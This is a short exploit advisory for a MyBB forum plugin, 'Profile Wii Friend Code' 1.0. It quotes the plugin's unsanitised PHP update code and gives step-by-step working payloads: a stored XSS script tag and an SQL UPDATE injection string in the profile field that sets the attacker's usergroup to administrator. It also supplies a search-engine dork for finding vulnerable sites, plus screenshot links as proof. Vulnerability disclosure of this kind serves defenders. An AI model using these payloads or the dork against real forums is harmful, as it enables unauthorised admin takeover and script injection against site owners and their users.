# Exploit Title: MyBB Profile Wii Friend Code SQLi/Persistent XSS# Dork: intitle:"Profile of" intext:"Wii Friend Code" inurl:member.php# Date: 1/3/2013# Exploit Author: Ichi# Vendor Homepage: http://mods.mybb.com/view/profile-wii-friend-code# Software Link: http://mods.mybb.com/download/profile-wii-friend-code# Version: 1.0# Tested on: Windows 7 64-bit"Profile Wii Friend Code" MyBB plugin is vulnerable to SQL UPDATE Injection and Persistent XSS.
The vulnerable code lies here(in profilewfc.php):<?php
function profilewfc_update($wfc){global $mybb;if(isset($mybb->input['wfc'])){
$wfc->user_update_data['wfc']= $mybb->input['wfc'];}}
?>
As you can see the inputisnot sanitized in the least...
Persistent XSS:1. Go to your user cp and edit your profile - usercp.php?action=profile
2.and at the "Wii Friend Code Wii Friend Code" box enter:<script>alert(1)</script>and then press submit
3. http://prntscr.com/o1x2p, submit,and http://prntscr.com/o1x69
SQL Injection:1. Go to your user cp and edit your profile - usercp.php?action=profile
2. Enter this into the Wii Friend Code field as you would do with the 1st vulnerability: x', usergroup='43. submit and now you belong to whatever usergroup to choice to belong to
PoC:
Before: http://prntscr.com/o1xkg
Exploit: http://prntscr.com/o1xnd
Aftermath(now an admin): http://prntscr.com/o1xoj
https://twitter.com/TeamDigi7al
~Ichi
